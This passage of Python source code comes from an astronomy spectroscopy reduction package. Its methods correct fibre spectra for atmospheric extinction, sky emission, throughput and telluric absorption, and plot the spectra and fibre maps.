plt.plot(extinction_curve_wavelengths, extinction_corrected_airmass, "+")
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
cinco_por_ciento = 0.05 * (
np.max(self.extinction_correction) - np.min(self.extinction_correction)
)
plt.ylim(
np.min(self.extinction_correction) - cinco_por_ciento,
np.max(self.extinction_correction) + cinco_por_ciento,
)
plt.plot(self.wavelength, self.extinction_correction, "g")
plt.minorticks_on()
plt.title("Correction for extinction using airmass = {}".format(self.airmass))
plt.ylabel("Flux correction")
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
# Correct for extinction at given airmass
print(" Airmass = {}".format(self.airmass))
print(" Observatory file with extinction curve : {}".format(observatory_file))
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] * self.extinction_correction
)
print(" Intensities corrected for extinction stored in self.intensity_corrected !")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def find_sky_emission(
        self,
        intensidad=[0, 0],
        plot=True,
        n_sky=200,
        sky_fibres=[1000],
        sky_wave_min=0,
        sky_wave_max=0,
        norm=colors.LogNorm(),
    ):
        """
        Identify sky fibres, build a combined sky spectrum and subtract it.

        Parameters
        ----------
        intensidad
            Intensity array to use.  The sentinel default [0, 0] means
            "use self.intensity_corrected" and subtract the sky in place.
        plot
            If True, show the sky-fibre map, the combined sky spectrum and
            the per-fibre medians after subtraction.
        n_sky
            Number of lowest-flux fibres used to build the sky spectrum
            (only when sky_fibres is left at its sentinel default).
        sky_fibres
            Explicit list of sky fibres.  The sentinel default [1000] means
            "pick the n_sky faintest fibres automatically".
        sky_wave_min, sky_wave_max
            Wavelength range used to rank fibres by integrated flux;
            0 means use self.valid_wave_min / self.valid_wave_max.
        norm
            Colour normalisation (appears unused in this method — kept for
            interface compatibility; confirm before removing).

        Returns
        -------
        None.  Results stored in self.sky_fibres, self.sky_emission and
        self.intensity_corrected (in place) or self.intensity_sky_corrected.
        """
        # Sentinel 0 -> fall back to the instrument's valid wavelength limits.
        if sky_wave_min == 0:
            sky_wave_min = self.valid_wave_min
        if sky_wave_max == 0:
            sky_wave_max = self.valid_wave_max
        # Sentinel [0, 0] -> operate on self.intensity_corrected in place
        # (ic == 1); otherwise keep the input and fill intensity_sky_corrected
        # (ic == 0).
        if np.nanmedian(intensidad) == 0:
            intensidad = self.intensity_corrected
            ic = 1
        else:
            ic = 0
        if sky_fibres[0] == 1000:  # As it was original (sentinel: auto-select)
            # sorted_by_flux = np.argsort(flux_ratio) ORIGINAL till 21 Jan 2019
            # NEW 21 Jan 2019: Assuming cleaning of cosmics and CCD defects, we just use the spaxels with the LOWEST INTEGRATED VALUES
            self.compute_integrated_fibre(
                valid_wave_min=sky_wave_min, valid_wave_max=sky_wave_max, plot=False
            )
            sorted_by_flux = np.argsort(
                self.integrated_fibre
            )  # (self.integrated_fibre)
            print("\n> Identifying sky spaxels using the lowest integrated values in the [ {} , {}] range ...".format(sky_wave_min, sky_wave_max))
            # if plot:
            # # print "\n Plotting fluxes and flux ratio: "
            # plt.figure(figsize=(10, 4))
            # plt.plot(flux_ratio[sorted_by_flux], 'r-', label='flux ratio')
            # plt.plot(flux_sky[sorted_by_flux], 'c-', label='flux sky')
            # plt.plot(flux_object[sorted_by_flux], 'k-', label='flux object')
            # plt.axvline(x=n_sky)
            # plt.xlabel("Spaxel")
            # plt.ylabel("Flux")
            # plt.yscale('log')
            # plt.legend(frameon=False, loc=4)
            # plt.show()
            # Angel routine: just take n lowest spaxels!
            optimal_n = n_sky
            print("  We use the lowest {} fibres for getting sky. Their positions are:".format(optimal_n))
            # Compute sky spectrum (median over the faintest fibres) and plot it
            self.sky_fibres = sorted_by_flux[:optimal_n]
            self.sky_emission = np.nanmedian(
                intensidad[sorted_by_flux[:optimal_n]], axis=0
            )
            print("  List of fibres used for sky saved in self.sky_fibres")
        else:  # We provide a list with sky positions
            print("  We use the list provided to get the sky spectrum")
            print("  sky_fibres = {}".format(sky_fibres))
            self.sky_fibres = np.array(sky_fibres)
            self.sky_emission = np.nanmedian(intensidad[self.sky_fibres], axis=0)
        if plot:
            # Map of the selected sky fibres (None is passed as the map norm).
            self.RSS_map(
                self.integrated_fibre, None, self.sky_fibres, title=" - Sky Spaxels"
            )  # flux_ratio
            # print " Combined sky spectrum:"
            plt.figure(figsize=(10, 4))
            plt.plot(self.wavelength, self.sky_emission, "c-", label="sky")
            plt.yscale("log")
            plt.ylabel("FLux")
            plt.xlabel("Wavelength [$\AA$]")
            plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
            plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
            plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
            plt.ylim([np.nanmin(intensidad), np.nanmax(intensidad)])
            plt.minorticks_on()
            plt.title("{} - Combined Sky Spectrum".format(self.description))
            plt.legend(frameon=False)
            # plt.show()
            # plt.close()
        # Substract sky in all intensities (in place if ic == 1, otherwise
        # into the separate intensity_sky_corrected array).
        self.intensity_sky_corrected = np.zeros_like(self.intensity)
        for i in range(self.n_spectra):
            if ic == 1:
                self.intensity_corrected[i, :] = (
                    self.intensity_corrected[i, :] - self.sky_emission
                )
            if ic == 0:
                self.intensity_sky_corrected[i, :] = (
                    self.intensity_corrected[i, :] - self.sky_emission
                )
        last_sky_fibre = self.sky_fibres[-1]
        # Plot median value of fibre vs. fibre, marking the level of the
        # faintest selected sky fibre as a reference line.
        if plot:
            median_sky_corrected = np.zeros(self.n_spectra)
            for i in range(self.n_spectra):
                if ic == 1:
                    median_sky_corrected[i] = np.nanmedian(
                        self.intensity_corrected[i, :], axis=0
                    )
                if ic == 0:
                    median_sky_corrected[i] = np.nanmedian(
                        self.intensity_sky_corrected[i, :], axis=0
                    )
            plt.figure(figsize=(10, 4))
            plt.plot(median_sky_corrected)
            plt.plot(
                [0, 1000],
                [
                    median_sky_corrected[last_sky_fibre],
                    median_sky_corrected[last_sky_fibre],
                ],
                "r",
            )
            plt.minorticks_on()
            plt.ylabel("Median Flux")
            plt.xlabel("Fibre")
            plt.yscale("log")
            plt.ylim([np.nanmin(median_sky_corrected), np.nanmax(median_sky_corrected)])
            plt.title(self.description)
            plt.legend(frameon=False)
            # plt.show()
            # plt.close()
        print("  Sky spectrum obtained and stored in self.sky_emission !! ")
        print("  Intensities corrected for sky emission and stored in self.intensity_corrected !")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def find_relative_throughput(
self,
ymin=10000,
ymax=200000, # nskyflat=False,
kernel_sky_spectrum=5,
wave_min_scale=0,
wave_max_scale=0,
plot=True,
):
"""
Determine the relative transmission of each spectrum
using a skyflat.
Parameters
----------
ymin
ymax
kernel_sky_spectrum
wave_min_scale
wave_max_scale
plot
Returns
-------
"""
# These are for the normalized flat:
# fit_skyflat_degree=0, step=50, wave_min_flat=0, wave_max_flat=0):
print("\n> Using this skyflat to find relative throughput (a scale per fibre)...")
# Check grating to chose wavelength range to get median values
if wave_min_scale == 0 and wave_max_scale == 0:
if self.grating == "1000R":
wave_min_scale = 6600.0
wave_max_scale = 6800.0
print(" For 1000R, we use the median value in the [6600, 6800] range.")
if self.grating == "1500V":
wave_min_scale = 5100.0
wave_max_scale = 5300.0
print(" For 1500V, we use the median value in the [5100, 5300] range.")
if self.grating == "580V":
wave_min_scale = 4700.0
wave_max_scale = 4800.0
print(" For 580V, we use the median value in the [4700, 4800] range.")
if self.grating == "385R":
wave_min_scale = 6600.0
wave_max_scale = 6800.0
print(" For 385R, we use the median value in the [6600, 6800] range.")
# print(" For {}, we use the median value in the [{}, {}] range.".format(
# self.grating, wave_min_scale, wave_max_scale))
else:
if wave_min_scale == 0:
wave_min_scale = self.wavelength[0]
if wave_max_scale == 0:
wave_max_scale = self.wavelength[-1]
print(" As given by the user, we use the median value in the [{} , {}] range.".format(wave_min_scale, wave_max_scale))
median_region = np.zeros(self.n_spectra)
for i in range(self.n_spectra):
region = np.where(
(self.wavelength > wave_min_scale) & (self.wavelength < wave_max_scale)
)
median_region[i] = np.nanmedian(self.intensity[i, region])
median_value_skyflat = np.nanmedian(median_region)
self.relative_throughput = median_region/median_value_skyflat
print(" Median value of skyflat in the [ {} , {}] range = {}".format(wave_min_scale, wave_max_scale, median_value_skyflat))
print(" Individual fibre corrections: min = {} max = {}".format(np.nanmin(self.relative_throughput), np.nanmax(self.relative_throughput)))
if plot:
plt.figure(figsize=(10, 4))
x = list(range(self.n_spectra))
plt.plot(x, self.relative_throughput)
# plt.ylim(0.5,4)
plt.minorticks_on()
plt.xlabel("Fibre")
plt.ylabel("Throughput using scale")
plt.title("Throughput correction using scale")
# plt.show()
# plt.close()
# print "\n Plotting spectra WITHOUT considering throughput correction..."
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
plt.plot(self.wavelength, self.intensity[i, ])
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra WITHOUT considering any throughput correction")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.ylim(ymin, ymax)
plt.minorticks_on()
# plt.show()
# plt.close()
# print " Plotting spectra CONSIDERING throughput correction..."
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
# self.intensity_corrected[i,] = self.intensity[i,] * self.relative_throughput[i]
plot_this = self.intensity[i, ]/self.relative_throughput[i]
plt.plot(self.wavelength, plot_this)
plt.ylim(ymin, ymax)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra CONSIDERING throughput correction (scale)")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=wave_min_scale, color="k", linestyle="--")
plt.axvline(x=wave_max_scale, color="k", linestyle="--")
# plt.show()
# plt.close()
print("\n> Using median value of skyflat considering a median filter of {} ...".format(kernel_sky_spectrum)) # LUKE
median_sky_spectrum = np.nanmedian(self.intensity, axis=0)
self.response_sky_spectrum = np.zeros_like(self.intensity)
rms = np.zeros(self.n_spectra)
plot_fibres = [100, 500, 501, 900]
pf = 0
for i in range(self.n_spectra):
self.response_sky_spectrum[i] = (
(self.intensity[i]/self.relative_throughput[i])/median_sky_spectrum
)
filter_response_sky_spectrum = sig.medfilt(
self.response_sky_spectrum[i], kernel_size=kernel_sky_spectrum
)
rms[i] = np.nansum(
np.abs(self.response_sky_spectrum[i] - filter_response_sky_spectrum)
)/np.nansum(self.response_sky_spectrum[i])
if plot:
if i == plot_fibres[pf]:
plt.figure(figsize=(10, 4))
plt.plot(
self.wavelength,
self.response_sky_spectrum[i],
alpha=0.3,
label="Response Sky",
)
plt.plot(
self.wavelength,
filter_response_sky_spectrum,
alpha=0.7,
linestyle="--",
label="Filtered Response Sky",
)
plt.plot(
self.wavelength,
self.response_sky_spectrum[i]/filter_response_sky_spectrum,
alpha=1,
label="Normalized Skyflat",
)
plt.xlim(self.wavelength[0] - 50, self.wavelength[-1] + 50)
plt.ylim(0.95, 1.05)
ptitle = "Fibre {} with rms = {}".format(i, rms[i])
plt.title(ptitle)
plt.xlabel("Wavelength [$\AA$]")
plt.legend(frameon=False, loc=3, ncol=1)
# plt.show()
# plt.close()
if pf < len(plot_fibres) - 1:
pf = pf + 1
print(" median rms = {} min rms = {} max rms = {}".format(np.nanmedian(rms), np.nanmin(rms),np.nanmax(rms)))
# if plot:
# plt.figure(figsize=(10, 4))
# for i in range(self.n_spectra):
# #plt.plot(self.wavelength,self.intensity[i,]/median_sky_spectrum)
# plot_this = self.intensity[i,] / self.relative_throughput[i] /median_sky_spectrum
# plt.plot(self.wavelength, plot_this)
# plt.xlabel("Wavelength [$\AA$]")
# plt.title("Spectra CONSIDERING throughput correction (scale) / median sky spectrum")
# plt.xlim(self.wavelength[0]-10,self.wavelength[-1]+10)
# plt.ylim(0.7,1.3)
# plt.minorticks_on()
# plt.show()
# plt.close()
#
# plt.plot(self.wavelength, median_sky_spectrum, color='r',alpha=0.7)
# plt.plot(self.wavelength, filter_median_sky_spectrum, color='blue',alpha=0.7)
# plt.show()
# plt.close()
#
# plt.plot(self.wavelength, median_sky_spectrum/filter_median_sky_spectrum, color='r',alpha=0.7)
# plt.show()
# plt.close()
# for i in range(2):
# response_sky_spectrum_ = self.intensity[500+i,] / self.relative_throughput[500+i] /median_sky_spectrum
# filter_response_sky_spectrum = sig.medfilt(response_sky_spectrum_,kernel_size=kernel_sky_spectrum)
# rms=np.nansum(np.abs(response_sky_spectrum_ - filter_response_sky_spectrum))/np.nansum(response_sky_spectrum_)
# for i in range(5):
# filter_response_sky_spectrum_ = (self.intensity[500+i,] / self.relative_throughput[500+i] ) / median_sky_spectrum
# filter_response_sky_spectrum = sig.medfilt(filter_response_sky_spectrum_,kernel_size=kernel_sky_spectrum)
#
# plt.plot(self.wavelength, filter_response_sky_spectrum,alpha=0.7)
# plt.ylim(0.95,1.05)
# plt.show()
# plt.close()
print("\n> Relative throughput using skyflat scaled stored in self.relative_throughput !!")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def get_telluric_correction(
        self,
        n_fibres=10,
        correct_from=6850.0,
        correct_to=10000.0,
        apply_tc=False,
        step=10,
        combined_cube=False,
        weight_fit_median=0.5,
        exclude_wlm=[
            [6450, 6700],
            [6850, 7050],
            [7130, 7380],
        ],  # This is range for 1000R
        wave_min=0,
        wave_max=0,
        plot=True,
        fig_size=12,
        verbose=False,
    ):
        """ # TODO BLAKE: always use false, use plots to make sure it's good. prob just save as a different file.
        Get telluric correction using a spectrophotometric star.

        The star spectrum is built from the n_fibres brightest fibres (or
        taken from the combined cube), a smoothed continuum is fitted, and
        the ratio smoothed/observed inside [correct_from, correct_to]
        becomes the multiplicative correction (1 elsewhere).

        Parameters
        ----------
        n_fibres: integer
            number of fibers to add for obtaining spectrum
        correct_from : float
            wavelength from which telluric correction is applied (default = 6850)
        correct_to : float
            wavelength up to which the correction is applied (default = 10000)
        apply_tc : boolean (default = False)
            apply telluric correction to data
        step, weight_fit_median:
            smoothing parameters forwarded to smooth_spectrum
        combined_cube : boolean
            if True, use self.combined_cube instead of this RSS
        exclude_wlm=[[6450,6700],[6850,7050], [7130,7380]]:
            Wavelength ranges not considering for normalising stellar continuum
        wave_min, wave_max:
            wavelength range used for the continuum fit; 0 means full range
        plot, fig_size, verbose:
            plotting / verbosity options

        Returns
        -------
        telluric_correction : 1-D array, one factor per wavelength pixel.

        Example
        ----------
        telluric_correction_star1 = star1r.get_telluric_correction(n_fibres=15)
        """
        print("\n> Obtaining telluric correction using spectrophotometric star...")
        # Pick the wavelength grid of the data actually being used.
        if combined_cube:
            wlm = self.combined_cube.wavelength
        else:
            wlm = self.wavelength
        if wave_min == 0:
            wave_min = wlm[0]
        if wave_max == 0:
            wave_max = wlm[-1]
        if combined_cube:
            # seeing == 0 is used as "integrated star flux not computed yet".
            if self.combined_cube.seeing == 0:
                self.combined_cube.half_light_spectrum(
                    5, plot=plot, min_wave=wave_min, max_wave=wave_max
                )
            estrella = self.combined_cube.integrated_star_flux
        else:
            # Sum the n_fibres brightest fibres to build the star spectrum.
            integrated_intensity_sorted = np.argsort(self.integrated_fibre)
            intensidad = self.intensity_corrected
            region = []
            for fibre in range(n_fibres):
                region.append(integrated_intensity_sorted[-1 - fibre])
            estrella = np.nansum(intensidad[region], axis=0)
        # Smoothed stellar continuum, ignoring the excluded ranges
        # (telluric bands / stellar features).
        smooth_med_star = smooth_spectrum(
            wlm,
            estrella,
            wave_min=wave_min,
            wave_max=wave_max,
            step=step,
            weight_fit_median=weight_fit_median,
            exclude_wlm=exclude_wlm,
            plot=plot,
            verbose=verbose,
        )
        # Correction = continuum / observed, only inside the telluric window.
        telluric_correction = np.ones(len(wlm))
        for l in range(len(wlm)):
            if wlm[l] > correct_from and wlm[l] < correct_to:
                telluric_correction[l] = smooth_med_star[l]/estrella[l]  # TODO: should be float, check when have star data
        if plot:
            plt.figure(figsize=(fig_size, fig_size / 2.5))
            if combined_cube:
                print("  Telluric correction for this star ({}) :".format(self.combined_cube.object))
                plt.plot(wlm, estrella, color="b", alpha=0.3)
                plt.plot(wlm, estrella * telluric_correction, color="g", alpha=0.5)
                plt.ylim(np.nanmin(estrella), np.nanmax(estrella))
            else:
                print("  Example of telluric correction using fibres {} and {} :".format(region[0], region[1]))
                plt.plot(wlm, intensidad[region[0]], color="b", alpha=0.3)
                plt.plot(
                    wlm,
                    intensidad[region[0]] * telluric_correction,
                    color="g",
                    alpha=0.5,
                )
                plt.plot(wlm, intensidad[region[1]], color="b", alpha=0.3)
                plt.plot(
                    wlm,
                    intensidad[region[1]] * telluric_correction,
                    color="g",
                    alpha=0.5,
                )
                plt.ylim(
                    np.nanmin(intensidad[region[1]]), np.nanmax(intensidad[region[0]])
                )  # CHECK THIS AUTOMATICALLY
            plt.axvline(x=wave_min, color="k", linestyle="--")
            plt.axvline(x=wave_max, color="k", linestyle="--")
            plt.xlim(wlm[0] - 10, wlm[-1] + 10)
            plt.xlabel("Wavelength [$\AA$]")
            # Shade the excluded continuum ranges, unless disabled with [[0,...]].
            if exclude_wlm[0][0] != 0:
                for i in range(len(exclude_wlm)):
                    plt.axvspan(
                        exclude_wlm[i][0], exclude_wlm[i][1], color="r", alpha=0.1
                    )
            plt.minorticks_on()
            # plt.show()
            # plt.close()
        if apply_tc:  # Check this
            # Multiply the data by the correction in place.
            print("  Applying telluric correction to this star...")
            if combined_cube:
                self.combined_cube.integrated_star_flux = (
                    self.combined_cube.integrated_star_flux * telluric_correction
                )
                for i in range(self.combined_cube.n_rows):
                    for j in range(self.combined_cube.n_cols):
                        self.combined_cube.data[:, i, j] = (
                            self.combined_cube.data[:, i, j] * telluric_correction
                        )
            else:
                for i in range(self.n_spectra):
                    self.intensity_corrected[i, :] = (
                        self.intensity_corrected[i, :] * telluric_correction
                    )
        return telluric_correction
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectrum(self, spectrum_number, sky=True, xmin=0, xmax=0, ymax=0, ymin=0):
"""
Plot spectrum of a particular spaxel.
Parameters
----------
spectrum_number:
spaxel to show spectrum.
sky:
if True substracts the sky
Example
-------
>>> rss1.plot_spectrum(550, sky=True)
"""
if sky:
spectrum = self.intensity_corrected[spectrum_number]
else:
spectrum = self.intensity_corrected[spectrum_number] + self.sky_emission
plt.plot(self.wavelength, spectrum)
# error = 3*np.sqrt(self.variance[spectrum_number])
# plt.fill_between(self.wavelength, spectrum-error, spectrum+error, alpha=.1)
if xmin != 0 or xmax != 0 or ymax != 0 or ymin != 0:
if xmin == 0:
xmin = self.wavelength[0]
if xmax == 0:
xmax = self.wavelength[-1]
if ymin == 0:
ymin = np.nanmin(spectrum)
if ymax == 0:
ymax = np.nanmax(spectrum)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Relative Flux")
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectra(
self,
list_spectra="all",
wavelength_range=[0],
xmin="",
xmax="",
ymax=1000,
ymin=-100,
fig_size=10,
save_file="",
sky=True,
):
"""
Plot spectrum of a list pf spaxels.
Parameters
----------
list_spectra:
spaxels to show spectrum. Default is all.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> rss1.plot_spectra([1200,1300])
"""
plt.figure(figsize=(fig_size, fig_size / 2.5))
if list_spectra == "all":
list_spectra = list(range(self.n_spectra))
if len(wavelength_range) == 2:
plt.xlim(wavelength_range[0], wavelength_range[1])
if xmin == "":
xmin = np.nanmin(self.wavelength)
if xmax == "":
xmax = np.nanmax(self.wavelength)
# title = "Spectrum of spaxel {} in {}".format(spectrum_number, self.description)
# plt.title(title)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Relative Flux")
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
for i in list_spectra:
self.plot_spectrum(i, sky)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_combined_spectrum(
self,
list_spectra="all",
sky=True,
median=False,
xmin="",
xmax="",
ymax="",
ymin="",
fig_size=10,
save_file="",
plot=True,
):
"""
Plot combined spectrum of a list and return the combined spectrum.
Parameters
----------
list_spectra:
spaxels to show combined spectrum. Default is all.
sky:
if True substracts the sky
Example
-------
>>> rss1.plot_spectrum(550, sky=True)
"""
if list_spectra == "all":
list_spectra = list(range(self.n_spectra))
spectrum = np.zeros_like(self.intensity_corrected[list_spectra[0]])
value_list = []
# Note: spectrum of fibre is located in position fibre-1, e.g., spectrum of fibre 1 -> intensity_corrected[0]
if sky:
for fibre in list_spectra:
value_list.append(self.intensity_corrected[fibre - 1])
else:
for fibre in list_spectra:
value_list.append(
self.intensity_corrected[fibre - 1] + self.sky_emission
)
if median:
spectrum = np.nanmedian(value_list, axis=0)
else:
spectrum = np.nansum(value_list, axis=0)
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
if xmin == "":
xmin = np.nanmin(self.wavelength)
if xmax == "":
xmax = np.nanmax(self.wavelength)
if ymin == "":
ymin = np.nanmin(spectrum)
if ymax == "":
ymax = np.nanmax(spectrum)
plt.plot(self.wavelength, spectrum)
if len(list_spectra) == list_spectra[-1] - list_spectra[0] + 1:
title = "{} - Combined spectrum in range [{},{}]".format(
self.description, list_spectra[0], list_spectra[-1]
)
else:
title = "Combined spectrum using requested fibres"
plt.title(title)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Relative Flux")
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
return spectrum
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def flux_between(self, lambda_min, lambda_max, list_spectra=[]):
"""
Parameters
----------
lambda_min
lambda_max
list_spectra
Returns
-------
"""
index_min = np.searchsorted(self.wavelength, lambda_min)
index_max = np.searchsorted(self.wavelength, lambda_max) + 1
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
n_spectra = len(list_spectra)
fluxes = np.empty(n_spectra)
variance = np.empty(n_spectra)
for i in range(n_spectra):
fluxes[i] = np.nanmean(self.intensity[list_spectra[i], index_min:index_max])
variance[i] = np.nanmean(
self.variance[list_spectra[i], index_min:index_max]
)
return fluxes * (lambda_max - lambda_min), variance * (lambda_max - lambda_min)
# WARNING: Are we overestimating errors?
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def median_between(self, lambda_min, lambda_max, list_spectra=[]):
"""
Parameters
----------
lambda_min
lambda_max
list_spectra
Returns
-------
"""
index_min = np.searchsorted(self.wavelength, lambda_min)
index_max = np.searchsorted(self.wavelength, lambda_max) + 1
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
n_spectra = len(list_spectra)
medians = np.empty(n_spectra)
for i in range(n_spectra):
medians[i] = np.nanmedian(
self.intensity[list_spectra[i], index_min:index_max]
)
return medians
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def line_flux(
self,
left_min,
left_max,
line_min,
line_max,
right_min,
right_max,
list_spectra=[],
):
"""
Parameters
----------
left_min
left_max
line_min
line_max
right_min
right_max
list_spectra
Returns
-------
"""
# TODO: can remove old_div once this function is understood, currently not called in whole module.
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
line, var_line = self.flux_between(line_min, line_max, list_spectra)
left, var_left = old_div(self.flux_between(left_min, left_max, list_spectra), (
left_max - left_min
))
right, var_right = old_div(self.flux_between(right_min, right_max, list_spectra), (
left_max - left_min
))
wavelength_left = old_div((left_min + left_max), 2)
wavelength_line = old_div((line_min + line_max), 2)
wavelength_right = old_div((right_min + right_max), 2)
continuum = left + old_div((right - left) * (wavelength_line - wavelength_left), (
wavelength_right - wavelength_left
))
var_continuum = old_div((var_left + var_right), 2)
return (
line - continuum * (line_max - line_min),
var_line + var_continuum * (line_max - line_min),
)
# WARNING: Are we overestimating errors?
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def RSS_map(
self,
variable,
norm=colors.LogNorm(),
list_spectra=[],
title=" - RSS map",
color_bar_text="Integrated Flux [Arbitrary units]",
):
"""
Plot map showing the offsets, coloured by variable.
Parameters
----------
variable
norm
list_spectra
title
color_bar_text
Returns
-------
"""
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
plt.figure(figsize=(10, 10))
plt.scatter(
self.offset_RA_arcsec[list_spectra],
self.offset_DEC_arcsec[list_spectra],
c=variable[list_spectra],
cmap=fuego_color_map,
norm=norm,
s=260,
marker="h",
)
plt.title(self.description + title)
plt.xlim(
np.nanmin(self.offset_RA_arcsec) - 0.7,
np.nanmax(self.offset_RA_arcsec) + 0.7,
)
plt.ylim(
np.nanmin(self.offset_DEC_arcsec) - 0.7,
np.nanmax(self.offset_DEC_arcsec) + 0.7,
)
plt.xlabel("$\Delta$ RA [arcsec]")
plt.ylabel("$\Delta$ DEC [arcsec]")
plt.minorticks_on()
plt.grid(which="both")
plt.gca().invert_xaxis()
cbar = plt.colorbar()
plt.clim(np.nanmin(variable[list_spectra]), np.nanmax(variable[list_spectra]))
cbar.set_label(color_bar_text, rotation=90, labelpad=40)
cbar.ax.tick_params()
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def RSS_image(
self,
image=[0],
norm=colors.Normalize(),
cmap="seismic_r",
clow=0,
chigh=0,
labelpad=10,
title=" - RSS image",
color_bar_text="Integrated Flux [Arbitrary units]",
fig_size=13.5,
):
"""
Plot RSS image coloured by variable.
cmap = "binary_r" nice greyscale
Parameters
----------
image
norm
cmap
clow
chigh
labelpad
title
color_bar_text
fig_size
Returns
-------
"""
if np.nanmedian(image) == 0:
image = self.intensity_corrected
if clow == 0:
clow = np.nanpercentile(image, 5)
if chigh == 0:
chigh = np.nanpercentile(image, 95)
if cmap == "seismic_r":
max_abs = np.nanmax([np.abs(clow), np.abs(chigh)])
clow = -max_abs
chigh = max_abs
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.imshow(image, norm=norm, cmap=cmap, clim=(clow, chigh))
plt.title(self.description + title)
plt.minorticks_on()
plt.gca().invert_yaxis()
# plt.colorbar()
cbar = plt.colorbar()
cbar.set_label(color_bar_text, rotation=90, labelpad=labelpad)
cbar.ax.tick_params()
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_corrected_vs_uncorrected_spectrum(self, high_fibres=10, fig_size=12):
"""
Parameters
----------
high_fibres
fig_size
Returns
-------
"""
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = []
for fibre_ in range(high_fibres):
region.append(integrated_intensity_sorted[-1 - fibre_])
plt.figure(figsize=(fig_size, fig_size / 2.5))
I = np.nansum(self.intensity[region], axis=0)
plt.plot(self.wavelength, I, "r-", label="Uncorrected", alpha=0.3)
Ic = np.nansum(self.intensity_corrected[region], axis=0)
I_ymin = np.nanmin([np.nanmin(I), np.nanmin(Ic)])
I_ymax = np.nanmax([np.nanmax(I), np.nanmax(Ic)])
I_rango = I_ymax - I_ymin
plt.plot(self.wavelength, Ic, "g-", label="Corrected", alpha=0.4)
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.minorticks_on()
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.ylim([I_ymin - (I_rango/10), I_ymax + (I_rango/10)])
plt.title(
self.object
+ " - Combined spectrum - "
+ "{}".format(high_fibres)
+ " fibres with highest intensity"
)
plt.legend(frameon=False, loc=4, ncol=2)
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Idea: take a RSS dominated by skylines. Read it (only throughput correction). For each fibre, fit Gaussians to ~10 skylines.
# Compare with REST wavelengths. Get a median value per fibre. Perform a second-order fit to all median values.
# Correct for that using a reference fibre (1). Save results to be applied to the rest of files of the night (assuming same configuration).
    def fix_2dfdr_wavelengths(
        self,
        sol=[0, 0, 0],
        fibre=0,
        maxima_sigma=2.5,
        maxima_offset=1.5,
        xmin=7740,
        xmax=7770,
        ymin=0,
        ymax=1000,
        plot=True,
        verbose=True,
        warnings=True,
    ):
        """
        Correct small 2dfdr wavelength-calibration offsets using sky lines.

        For each fibre, Gaussian fits to bright sky emission lines (read
        from "sky_lines_rest.dat") give per-line offsets versus their rest
        wavelengths; the median offset per fibre is then fitted with a
        second-order polynomial offset(fibre) = a0x + a1x*fibre + a2x*fibre**2
        and applied to self.intensity_corrected by rebinning each spectrum.
        Alternatively, previously derived coefficients can be supplied in
        ``sol`` and the fitting stage is skipped.

        Parameters
        ----------
        sol
            [a0x, a1x, a2x] polynomial coefficients. sol[0] == 0 (default)
            means "derive the coefficients here from the sky-line fits".
        fibre
            If non-zero, only this fibre is checked (verbose mode is forced);
            0 processes all fibres.
        maxima_sigma
            Maximum Gaussian sigma for a sky-line fit to be accepted.
        maxima_offset
            Maximum absolute centre offset for a sky-line fit to be accepted.
        xmin, xmax, ymin, ymax
            Axis limits for the before/after diagnostic plots.
        plot
            If True, show diagnostic plots.
        verbose
            If True, print per-line fit details (forced when fibre != 0).
        warnings
            Passed through to the Gaussian-fitting routine ``fluxes``.

        Returns
        -------
        None
            Results are stored in self.intensity_corrected and
            self.wavelength_parameters.
        """
        print("\n> Fixing 2dfdr wavelengths using skylines.")
        w = self.wavelength
        if sol[0] == 0:  # Solutions are not given
            # Read file with sky emission line rest wavelengths and their
            # per-line fitting-window parameters.
